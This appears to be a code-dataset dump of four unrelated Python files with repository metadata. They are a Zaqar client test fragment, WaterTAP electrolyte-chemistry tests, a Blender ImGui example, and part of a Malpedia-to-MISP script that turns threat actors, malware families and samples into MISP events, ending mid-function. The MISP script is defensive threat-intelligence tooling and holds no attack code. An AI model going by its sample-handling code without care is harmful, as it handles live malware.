self.assertEqual('http://server.test:5000/v3', client.api_url)
self.assertEqual(1.1, client.api_version)
self.assertEqual('test_tenant_id',
client.conf['auth_opts']['options']['os_project_id'])
def test_create_for_tenant(self):
context = utils.dummy_context()
plugin = context.clients.client_plugin('zaqar')
client = plugin.create_for_tenant('other_tenant', 'token')
self.assertEqual('other_tenant',
client.conf['auth_opts']['options']['os_project_id'])
self.assertEqual('token',
client.conf['auth_opts']['options']['os_auth_token'])
def test_event_sink(self):
context = utils.dummy_context()
client = context.clients.client('zaqar')
fake_queue = mock.MagicMock()
client.queue = lambda x, auto_create: fake_queue
sink = zaqar.ZaqarEventSink('myqueue')
sink.consume(context, {'hello': 'world'})
fake_queue.post.assert_called_once_with(
{'body': {'hello': 'world'}, 'ttl': 3600})
| 39.078431
| 78
| 0.66282
|
794d96d1424fb66ddc58b8247d8dfd491f4b9b3f
| 6,890
|
py
|
Python
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 4
|
2021-11-06T01:13:22.000Z
|
2022-02-08T21:16:38.000Z
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 233
|
2021-10-13T12:53:44.000Z
|
2022-03-31T21:59:50.000Z
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 12
|
2021-11-01T19:11:03.000Z
|
2022-03-08T22:20:58.000Z
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import pytest
from pyomo.environ import ConcreteModel, value
from idaes.core import FlowsheetBlock
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.core.util.scaling import (
calculate_scaling_factors,
get_scaling_factor,
constraint_scaling_transform,
)
from idaes.core.util import get_solver
from watertap.examples.flowsheets.full_treatment_train.model_components.eNRTL import (
entrl_config_FTPx,
entrl_config_FpcTP,
)
from watertap.examples.flowsheets.full_treatment_train.util import (
check_scaling,
solve_block,
)
def simulate_enrtl_FTPx(state_var_args):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = GenericParameterBlock(default=entrl_config_FTPx.configuration)
m.fs.state = m.fs.params.build_state_block(
m.fs.time, default={"defined_state": True}
)
for (v_name, ind), val in state_var_args.items():
var = getattr(m.fs.state[0], v_name)
var[ind].fix(val)
m.fs.state[0].flow_mol_phase["Liq"].value = 1
# scale model
calculate_scaling_factors(m)
# Regular solve
solver = get_solver()
results = solver.solve(m)
ksp = 3.2e-9 # Gibbs energy gives 3.9e-8, but this fits expectations better
saturation_index = value(
m.fs.state[0].act_phase_comp["Liq", "Ca_2+"]
* m.fs.state[0].act_phase_comp["Liq", "SO4_2-"]
* m.fs.state[0].act_phase_comp["Liq", "H2O"] ** 2
/ ksp
)
return saturation_index
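# Interpretation note (added): the returned quantity is the ion-activity
# product for gypsum (CaSO4·2H2O) divided by Ksp, so values above 1 indicate a
# supersaturated, scaling-prone solution.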
@pytest.mark.component
def test_enrtl_FTPx_0():
# seawater concentration
state_var_args = {
("temperature", None): 298,
("pressure", None): 101325,
("flow_mol", None): 100,
("mole_frac_comp", "Na_+"): 0.008845,
("mole_frac_comp", "Ca_2+"): 0.000174,
("mole_frac_comp", "Mg_2+"): 0.001049,
("mole_frac_comp", "SO4_2-"): 0.000407,
("mole_frac_comp", "Cl_-"): 0.010479,
("mole_frac_comp", "H2O"): 0.979046,
}
saturation_index = simulate_enrtl_FTPx(state_var_args)
assert saturation_index == pytest.approx(0.2198, rel=1e-3)
@pytest.mark.component
def test_enrtl_FTPx_1():
# 2 times seawater concentration
state_var_args = {
("temperature", None): 298,
("pressure", None): 101325,
("flow_mol", None): 100,
("mole_frac_comp", "Na_+"): 0.017327,
("mole_frac_comp", "Ca_2+"): 0.000341,
("mole_frac_comp", "Mg_2+"): 0.002054,
("mole_frac_comp", "SO4_2-"): 0.000796,
("mole_frac_comp", "Cl_-"): 0.020529,
("mole_frac_comp", "H2O"): 0.958952,
}
saturation_index = simulate_enrtl_FTPx(state_var_args)
assert saturation_index == pytest.approx(0.4333, rel=1e-3)
def simulate_enrtl_FpcTP(state_var_args):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = GenericParameterBlock(default=entrl_config_FpcTP.configuration)
m.fs.state = m.fs.params.build_state_block(
m.fs.time, default={"defined_state": True}
)
for (v_name, ind), val in state_var_args.items():
var = getattr(m.fs.state[0], v_name)
var[ind].fix(val)
# scale model
calculate_scaling_factors(m)
for (ind, c) in m.fs.state[0].true_to_appr_species.items():
sf = get_scaling_factor(m.fs.state[0].flow_mol_phase_comp_apparent[ind])
constraint_scaling_transform(c, sf)
for (ind, c) in m.fs.state[0].appr_mole_frac_constraint.items():
sf = get_scaling_factor(m.fs.state[0].mole_frac_phase_comp_apparent[ind])
constraint_scaling_transform(c, sf)
check_scaling(m)
solve_block(m)
ksp = 3.2e-9 # Gibbs energy gives 3.9e-8, but this fits expectations better
saturation_index = value(
m.fs.state[0].act_phase_comp["Liq", "Ca_2+"]
* m.fs.state[0].act_phase_comp["Liq", "SO4_2-"]
* m.fs.state[0].act_phase_comp["Liq", "H2O"] ** 2
/ ksp
)
return saturation_index
@pytest.mark.component
def test_enrtl_FpcTP_1():
# standard seawater concentration
feed_flow_mass = 1 # kg/s
feed_mass_frac_comp = {
"Na_+": 11122e-6,
"Ca_2+": 382e-6,
"Mg_2+": 1394e-6,
"SO4_2-": 2136e-6,
"Cl_-": 20316.88e-6,
}
feed_mass_frac_comp["H2O"] = 1 - sum(x for x in feed_mass_frac_comp.values())
mw_comp = {
"H2O": 18.015e-3,
"Na_+": 22.990e-3,
"Ca_2+": 40.078e-3,
"Mg_2+": 24.305e-3,
"SO4_2-": 96.06e-3,
"Cl_-": 35.453e-3,
}
feed_flow_mol_comp = {}
for j in feed_mass_frac_comp:
feed_flow_mol_comp[j] = feed_flow_mass * feed_mass_frac_comp[j] / mw_comp[j]
state_var_args = {("temperature", None): 298, ("pressure", None): 101325}
for j in feed_flow_mol_comp:
state_var_args[("flow_mol_phase_comp", ("Liq", j))] = feed_flow_mol_comp[j]
saturation_index = simulate_enrtl_FpcTP(state_var_args)
assert saturation_index == pytest.approx(0.2200, rel=1e-3)
@pytest.mark.component
def test_enrtl_FpcTP_2():
# seawater concentration with 50% water removal
feed_flow_mass = 1 # kg/s
feed_mass_frac_comp = {
"Na_+": 11122e-6,
"Ca_2+": 382e-6,
"Mg_2+": 1394e-6,
"SO4_2-": 2136e-6,
"Cl_-": 20316.88e-6,
}
feed_mass_frac_comp["H2O"] = 1 - sum(x for x in feed_mass_frac_comp.values())
mw_comp = {
"H2O": 18.015e-3,
"Na_+": 22.990e-3,
"Ca_2+": 40.078e-3,
"Mg_2+": 24.305e-3,
"SO4_2-": 96.06e-3,
"Cl_-": 35.453e-3,
}
feed_flow_mol_comp = {}
for j in feed_mass_frac_comp:
feed_flow_mol_comp[j] = feed_flow_mass * feed_mass_frac_comp[j] / mw_comp[j]
if j == "H2O":
feed_flow_mol_comp[j] = feed_flow_mol_comp[j] / 2
state_var_args = {("temperature", None): 298, ("pressure", None): 101325}
for j in feed_flow_mol_comp:
state_var_args[("flow_mol_phase_comp", ("Liq", j))] = feed_flow_mol_comp[j]
saturation_index = simulate_enrtl_FpcTP(state_var_args)
assert saturation_index == pytest.approx(0.4344, rel=1e-3)
| 33.446602
| 86
| 0.635994
|
794d978a14f5f28990ce6a168b4d71da54ad765b
| 2,708
|
py
|
Python
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 2
|
2021-12-21T16:38:58.000Z
|
2022-01-08T00:56:35.000Z
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-game-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 1
|
2022-01-29T05:46:50.000Z
|
2022-01-29T05:46:50.000Z
|
addons/BlenderImgui-main/ImguiExample/operators.py
|
V-Sekai/V-Sekai-Blender-game-tools
|
3473ad4abb737756290a9007273519460742960d
|
[
"MIT"
] | 1
|
2021-11-07T19:41:34.000Z
|
2021-11-07T19:41:34.000Z
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# Copyright (c) 2020 Elie Michel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.types import Operator
from .blender_imgui import ImguiBasedOperator
import imgui
# -------------------------------------------------------------------
class ImguiExample(Operator,ImguiBasedOperator):
"""Example of modal operator using ImGui"""
bl_idname = "object.imgui_example"
bl_label = "Imgui Example"
def draw(self, context):
# This is where you can use any code from pyimgui's doc
# see https://pyimgui.readthedocs.io/en/latest/
imgui.begin("Your first window!", True)
imgui.text("Hello world!")
imgui.text("Another line!")
imgui.text("And yet another")
changed, self.color = imgui.color_edit3("Pick a color: Color", *self.color)
changed, self.message = imgui.input_text_multiline(
'Message:',
self.message,
2056
)
imgui.text_colored(self.message, *self.color)
imgui.end()
def invoke(self, context, event):
self.color = (1.,.5,0.)
self.message = "Type something here!"
# Call init_imgui() at the beginning
self.init_imgui(context)
context.window_manager.modal_handler_add(self)
return {'RUNNING_MODAL'}
def modal(self, context, event):
context.area.tag_redraw()
# Handle the event as you wish here, as in any modal operator
if event.type in {'RIGHTMOUSE', 'ESC'}:
# Call shutdown_imgui() any time you'll return {'CANCELLED'} or {'FINISHED'}
self.shutdown_imgui()
return {'CANCELLED'}
# Don't forget to call parent's modal:
self.modal_imgui(context, event)
return {'RUNNING_MODAL'}
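# Usage note (added): after the add-on registers these classes, the operator
# can be launched from Blender's Python console with
#   bpy.ops.object.imgui_example('INVOKE_DEFAULT')
# which calls invoke() above and hands control to the modal ImGui loop.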
# -------------------------------------------------------------------
classes = (
ImguiExample,
)
register, unregister = bpy.utils.register_classes_factory(classes)
| 34.717949
| 88
| 0.627031
|
794d979ce249133f8b03d292589247f8fa791592
| 26,009
|
py
|
Python
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | 3
|
2020-07-10T15:13:32.000Z
|
2021-07-22T03:29:29.000Z
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | 2
|
2021-01-03T01:13:37.000Z
|
2021-01-03T01:13:54.000Z
|
misp_event_functions.py
|
malwaredevil/malpedia_to_misp
|
4e1fc211495a68822b1b9dee88cdd19715bf4491
|
[
"MIT"
] | null | null | null |
import pymisp as pm
import json
from pymisp.tools import make_binary_objects
from pymisp import MISPTag
from pymisp import ExpandedPyMISP, MISPEvent, ExpandedPyMISP, MISPAttribute
from pathlib import Path
import glob
import requests
from urllib3.exceptions import ProtocolError
import globals as gv
import sys
import os
import database_actions as db
import datetime
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import threading
import concurrent.futures as cf
from globals import _EXECUTOR as executor, _UPLOAD_EXECUTOR as uexecutor
# import time
try:
import lief # type: ignore
from lief import Logger # type: ignore
Logger.disable()
HAS_LIEF = True
# from .peobject import make_pe_objects
# from .elfobject import make_elf_objects
# from .machoobject import make_macho_objects
except ImportError:
HAS_LIEF = False
from pymisp.tools.elfobject import make_elf_objects
import pydeep # type: ignore
HAS_PYDEEP = True
# CHECK IF IS A VALID DATE
def valid_date(datestring):
try:
datetime.datetime.strptime(datestring, '%Y-%m-%d')
return True
except ValueError:
return False
def create_attribute(iCategory, iType, iValue, iIDS=1, iUUID="", iComment="", disableCorrelation=0):
retAttribute = pm.MISPAttribute()
try:
        # NOTE: trailing commas previously turned these values into one-element
        # tuples; plain assignments are intended.
        retAttribute.category = iCategory
        retAttribute.type = iType
        retAttribute.value = iValue
        retAttribute.to_ids = iIDS
        retAttribute.disable_correlation = disableCorrelation
if iUUID != "":
retAttribute.uuid = iUUID
if iComment != "":
retAttribute.comment = iComment
return retAttribute
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) create_attribute: {} {} {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
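# Illustrative usage (added; the hash value is hypothetical):
#
#   attr = create_attribute("Payload delivery", "md5",
#                           "9e107d9d372bb6826bd81d3542a419d6",
#                           iComment="hash pulled from a sandbox report")
#   # attr is a pymisp MISPAttribute that can then be attached to a MISPEvent.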
def pushToMISP(event, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug=""):
try:
mispDB = pm.ExpandedPyMISP(url=mURL, key=mKey, ssl=mVerifycert, debug=mDebug)
if gv._DEBUG:
print("f(x) pushToMISP(): PUSHING EVENT TO MISP: {}".format(event))
# NEW EVENT
if iUpdate == False:
event.publish()
event = mispDB.add_event(event, pythonify=True)
else:
event.publish()
event = mispDB.update_event(event, pythonify=True)
    except Exception as e:
        if gv._DEBUG:
            print("f(x) pushToMISP() ERROR: {}".format(e))
    else:
        print("f(x) pushToMISP: CREATED MISP EVENT: {}".format(event.info))
    return True
# def pushToMISPWithAttachment(event, iPath, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug="", fo=None, peo=None, seos=None):
# mispDB = ExpandedPyMISP(mURL, mKey, mVerifycert)
# # CREATE EVENT
# if iUpdate == False:
# event.publish()
# mispDB.add_event(event, pythonify=True)
# else:
# event.publish()
# mispDB.update_event(event, pythonify=True)
# p = Path(iPath)
# files = [p]
# arg_type = 'malware-sample'
# # Create attributes
# attributes = []
# for f in files:
# a = MISPAttribute()
# a.type = arg_type
# a.value = f.name
# a.data = f
# a.comment = "DATA FROM MALPEDIA."
# a.expand = 'binary'
# attributes.append(a)
# for a in attributes:
# mispDB.add_attribute(event.uuid, a)
# # # CREATE EVENT
# # if iUpdate == False:
# # event.publish()
# # mispDB.add_event(event, pythonify=True)
# # else:
# # event.publish()
# # mispDB.update_event(event, pythonify=True)
def pushToMISPWithAttachment(event, iPath, iUpdate=False, mURL="", mKey="", mVerifycert="", mDebug="", fo=None, peo=None, seos=None):
try:
mispDB = pm.ExpandedPyMISP(url=mURL, key=mKey, ssl=mVerifycert, debug=mDebug)
if gv._DEBUG:
print("f(x) pushToMISPWithAttachment() EVENT: {}".format(event))
# CREATE EVENT
if iUpdate == False:
event.publish()
mispDB.add_event(event, pythonify=True)
else:
event.publish()
mispDB.update_event(event, pythonify=True)
# # ADD ATTACHMENT
if iUpdate == False:
# myPath = iPath
# fo = None
# peo = None
# seos = None
# for f in glob.glob(myPath):
# try:
# fo , peo, seos = make_binary_objects(f)
# except Exception as e:
# continue
if seos:
try:
for s in seos:
try:
mispDB.add_object(event.uuid, s)
except Exception as e:
continue
except Exception as e:
pass
if peo:
try:
mispDB.add_object(event.uuid, peo, pythonify=True)
for ref in peo.ObjectReference:
try:
mispDB.add_object_reference(ref)
except Exception as e:
continue
except Exception as e:
pass
if fo:
try:
mispDB.add_object(event.uuid, fo)
for ref in fo.ObjectReference:
try:
mispDB.add_object_reference(ref, pythonify=True)
except Exception as e:
continue
except Exception as e:
pass
# UPDATE EVENT AFTER ADDING ATTACHMENT
try:
event.publish()
mispDB.publish(event)
print("f(x) pushToMISPWithAttachment: CREATED MISP EVENT: {}".format(event.info))
except Exception as e:
pass
except Exception as e:
if gv._DEBUG:
print("f(x) pushToMISPWithAttachment() ERROR: {}".format(e))
pass
# gv._THREAD_LIST.append(uexecutor.submit(pushToMISPWithAttachment,event, iPath, iUpdate, mURL, mKey, mVerifycert, mDebug, fo, peo, seos))
finally:
return True
# CREATES AN EVENT BASED ON UUID FOUND IN PARENT CHILD TABLE
# USES THE FOLLOWING GLOBAL VARIABLES
# ITERATE THROUGH TREE TO CREATE CHILDREN EVENTS
# _MISP_CREATE_CHILDREN = True
# ATTACH THE MALWARE, WHEN APPLICABLE. IF FALSE, ONLY METADATA (SECTIONS, SSDEEP, ETC), WILL BE PRESENT
# _MISP_ATTACH_FILES = False
def createIncident(iUUID, iUpdate=False):
try:
if gv._DEBUG:
print("f(x) createIncident: UUID: {}".format(iUUID))
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
# POSSIBLE VALUES:
# "ACTOR" : THREAT ACTOR: TOP LEVEL OF TREE.
# "FAMILY" : FAMILY (E.G. WIN.XAGENT): USUALLY MIDDLE OF TREE
# "MALWARE" : MALWARE FILE: BOTTOM OF TREE
# "PATH" : PATH (E.G. MODULES): USED WHEN IT IS NOT A FAMILY, FILE, OR ACTOR. JUST IN DISK PATH OF ACTUAL MALWARE
myType = iPC_META["mytype"]
if gv._DEBUG:
print("f(x) createIncident: TYPE: {}".format(myType))
# IF IT IS AN ACTOR
if myType == "ACTOR":
createActor(myUUID, iUpdate)
# IF IT IS A FAMILY
elif myType == "FAMILY":
createFamily(myUUID, iUpdate)
# IF IT IS MALWARE
elif myType == "MALWARE":
createMalware(iUUID, iUpdate)
# IF IT IS A PATH
elif myType == "PATH":
createPath(iUUID, iUpdate)
# CATCH EVERYTHING ELSE AND STOP PROCESS:
else:
print("f(x) createIncident: UNKNOWN TYPE")
sys.exit(0)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createIncident: {} {} {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE AN ACTOR [INCIDENT] IN MISP
def createActor(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myLinks = []
myTags = []
myMeta = []
myCommonName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET META FOR ACTOR (USE COMMON NAME AS INCIDENT NAME)
myMeta = db.get_actor_meta(myUUID)
if gv._DEBUG:
print("f(x) createActor: ACTOR META")
print(json.dumps(myMeta, indent=4))
# USED AS INCIDENT NAME
myCommonName = myMeta["commonname"]
event.info = "Threat Actor: " + myCommonName
print("f(x) createActor: ACTOR NAME: {}".format(myCommonName))
# USED AS A TEXT ATTRIBUTE
myDescription = myMeta["description"]
if myDescription != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myDescription, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, myDescription, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# -----------------------------------------------
# GET TAGS
if myCommonName != "UNATTRIBUTED" and myCommonName != "ERROR":
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createActor: TAGS CREATED")
print(*myTags, sep = "\n")
# REFERENCES/URLS
myLinks = db.get_links(myUUID)
for link in myLinks:
attributeType = "link"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createActor: CREATING ACTOR LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {}\nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, link["url"], attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, link["url"], comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createActor: CREATING ACTOR ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createActor: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A FAMILY [INCIDENT] IN MISP
def createFamily(iUUID, iUpdate=False ):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myLinks = []
myTags = []
myMeta = []
myCommonName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
event.extends_uuid = parentuuid
# -----------------------------------------------
# REFERENCES/URLS
myLinks = db.get_links(myUUID)
for link in myLinks:
attributeType = "link"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {}\nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, link["url"], attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, link["url"], comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createFamily: TAGS")
print(*myTags, sep = "\n")
# GET META FOR ACTOR (USE COMMON NAME AS INCIDENT NAME)
myMeta = db.get_family_meta( iUUID=myUUID)
if gv._DEBUG:
print("f(x) createFamily: META")
print(json.dumps(myMeta, indent=4))
# USED AS INCIDENT NAME
myCommonName = myMeta["commonname"]
event.info = myCommonName
print("f(x) createFamily: MALWARE NAME: {}".format(myCommonName))
# USED AS A TEXT ATTRIBUTE
myDescription = myMeta["description"]
if myDescription != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createFamily: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myDescription, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, myDescription, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createFamily: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# YARA
# ADD OBJECTS
# -----------------------------------------------
# YARA
iYara = db.get_yara_rules(myUUID)
tlp = ""
yaraAbsPath = ""
for yara in iYara:
tagList = []
newTag = MISPTag()
tlp = yara["tlp"]
yaraAbsPath = yara["path_to_yara"]
tlpTag = "tlp:" + tlp.split("_")[1]
newTag.name = tlpTag
tagList.append(newTag)
yaraUUID = yara["attribute_uuid"]
            yaraContents = ""
            with open(yaraAbsPath, 'r') as yaraIn:
                yaraContents = yaraIn.read()
misp_object = pm.tools.GenericObjectGenerator("yara")
misp_object.comment = tlpTag
misp_object.uuid = yaraUUID
subAttribute = misp_object.add_attribute("yara", yaraContents)
subAttribute.disable_correlation = True
subAttribute.to_ids = False
subAttribute.comment = tlpTag
subAttribute.tags = tagList
event.add_object(misp_object)
if gv._DEBUG:
print("f(x) createFamily: YARA")
print(*iYara, sep = "\n")
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createFamily: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A PATH [INCIDENT] IN MISP
def createPath(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myTags = []
myName = ""
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
myName = iPC_META["name"]
event.extends_uuid = parentuuid
event.info = myName
print("f(x) createPath: MALWARE PATH NAME: {}".format(myName))
# GET TAGS FROM PARENT AND ADD TO THIS PATH
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createPath: TAGS")
print(*myTags, sep = "\n")
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createPath: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
gv._THREAD_LIST.append(executor.submit(pushToMISP, event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG))
# pushToMISP(event, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createPath: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
# CREATE A MALWARE [INCIDENT] IN MISP
def createMalware(iUUID, iUpdate=False):
try:
# fUNCTION SETUP
# -----------------------------------------------
myUUID = iUUID
myTags = []
# ATTRIBUTES COMMON FIELDS
# -----------------------------------------------
attributeToIDS = 0 # 0 false : 1 true
attributeComment = ""
attribDisableCorrelation = 1 # 0 false : 1 true
# MISP SETUP
# -----------------------------------------------
event = pm.MISPEvent()
event.uuid = myUUID
# GET UUID METADATA FROM PARENT CHILD TABLE
# -----------------------------------------------
iPC_META = db.get_parent_child_data(iUUID=myUUID)
parentuuid = iPC_META["parentuuid"]
event.extends_uuid = parentuuid
name = iPC_META["name"]
if name in gv._BLACKLISTED_FILES:
return True
event.info = name
print("f(x) createMalware: MALWARE SAMPLE NAME: {}".format(name))
# SET VERSION
myVersion = iPC_META["version"]
if myVersion != "":
attributeType = "text"
attributeCategory = "Internal reference"
if gv._DEBUG:
print("f(x) createMalware: CREATING FAMILY COMMENT: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, myVersion, attributeToIDS, attributeComment, attribDisableCorrelation))
